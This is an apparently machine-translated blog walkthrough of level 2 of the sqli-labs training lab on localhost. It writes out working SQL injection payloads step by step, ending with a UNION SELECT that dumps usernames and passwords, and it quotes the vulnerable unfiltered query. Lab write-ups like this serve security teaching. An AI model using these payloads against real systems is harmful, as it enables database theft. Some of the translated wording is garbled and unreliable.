Next Blog: http://blog.51cto.com/tdcqvip/2060816
Came to the second pass:
http://127.0.0.1/sqli-labs-master/Less-2/
Visit http://127.0.0.1/sqli-labs-master/Less-2/?id=1
Determine if there is an injection point:
and 1 = 1 returns to normal
Http://127.0.0.1/sqli-labs-master/Less-2/?id=1 and 1 = 1%23
and 1 = 2 return failure
Http://127.0.0.1/sqli-labs-master/Less-2/?id=1 and 1 = 2%23
Indicates the presence of injection points:
Order BY N View fields
return correct when n=3
Http://127.0.0.1/sqli-labs-master/Less-2/?id=1 ORDER by 3%23
When = 4 o'clock returns an error
Http://127.0.0.1/sqli-labs-master/Less-2/?id=1 ORDER BY 4%23
The Description field is 3
To combine queries with Union select:
and display the display bit in the way of error:
Http://127.0.0.1/sqli-labs-master/Less-2/?id=-1 Union Select%23
The display bit can be seen on 2, 3.
Use version () and database () to see the PHP version and the name of the current Web site
We can see from the database that the "security" version is 5.5.53
Next we look at the table under database security:
Http://127.0.0.1/sqli-labs-master/Less-2/?id=-1 Union SELECT 1,GROUP_CONCAT (TABLE_NAME), 3 from Information_ Schema.tables WHERE table_schema = ' security '%23
You can see the Users table by
View columns in the Users table
Http://127.0.0.1/sqli-labs-master/Less-2/?id=-1 Union Select 1, Group_concat (column_name), 3 from Information_ Schema.columns WHERE table_name = ' users '%23
The next step is to look at the contents of username and password:
Http://127.0.0.1/sqli-labs-master/Less-2/?id=-1 Union Select 1,username,password from users where id = 2%23
End:
Statement: The source code has been changed by me, so it will be displayed when injected into the query statement
Next look at the source code:
<! doctype html public "-//w3c//dtd xhtml 1.0 transitional//en" "HTTP// Www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd ">
With the source code we can see that there is no filtering when connecting to the database query
And the first place is different
$sql = "SELECT * from users WHERE id= $id LIMIT 0,1";
There is no sign of "'" in this sentence.
Use the same way.
Third pass as soon as possible update
Public Number:
Sqli-labs-master Second pass: Error Based-intiger